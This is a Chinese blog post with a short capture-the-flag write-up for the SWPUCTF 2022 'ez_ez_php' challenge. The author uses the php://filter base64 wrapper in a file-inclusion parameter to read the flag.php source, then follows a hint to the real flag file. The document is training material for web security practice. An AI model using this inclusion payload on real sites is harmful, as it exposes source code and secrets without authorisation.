SWPUCTF 2022 新生赛ez_ez_php – 星雨の小破站

SWPUCTF 2022 新生赛ez_ez_php

2025-1-18 23:26

|

CTF,CTF-web,NSSCTF

|

318

189 字

|

2 分钟

本文最后更新于521 天前，其中的信息可能已经过时，如有错误请发送邮件到big_fw@foxmail.com

Pasted image 20241120152619.png

Pasted image 20241120152719.png

题目要求是以 GETQ方式提交名为file的参数，参数前三个字符为php时，输出Nice!!!
否则输出Hacker!
前三个字符为php时才能进行include($ GET["file"]);
这时很容易知道题目考的就是php伪协议，

php://filter

?file=php://filter/read=convert.base64-encode/resource=flag.php

Pasted image 20241120153140.png

解码：
< ?php
error_reporting(0);
header("Content-Type:text/html;charset=utf-8");
echo "NSSCTF{flag_is_not_here}" ."<br/>";

echo "real_flag_is_in_’flag’"."<br/>";
echo "换个思路，试试PHP伪协议呢";

显然flag不在这里
这时我们注意到解码的内容：
echo "real_flag_is_in_’flag’"."<br/>";
忽略了一个细节，将flag.php去掉.php试试

Pasted image 20241120153332.png

Pasted image 20241120153726.png

总结

PHP伪协议
php://filter
仔细阅读提示

文末附加内容

PHP伪协议文件包含

暂无评论

发送评论编辑评论

Markdown

悄悄话

邮件提醒

|´・ω・)ノ

ヾ(≧∇≦*)ゝ

(☆ω☆)

（╯‵□′）╯︵┴─┴

￣﹃￣

(/ω＼)

∠( ᐛ 」∠)＿

(๑•̀ㅁ•́ฅ)

→_→

୧(๑•̀⌄•́๑)૭

٩(ˊᗜˋ*)و

(ノ°ο°)ノ

(´இ皿இ｀)

⌇●﹏●⌇

(ฅ´ω`ฅ)

(╯°A°)╯︵○○○

φ(￣∇￣o)

ヾ(´･･｀｡)ノ"

( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃

(ó﹏ò｡)

Σ(っ °Д °;)っ

( ,,´･ω･)ﾉ"(´っω･｀｡)

╮(╯▽╰)╭

o(*////▽////*)q

＞﹏＜

( ๑´•ω•) "(ㆆᴗㆆ)

颜文字

Emoji

小恐龙

花!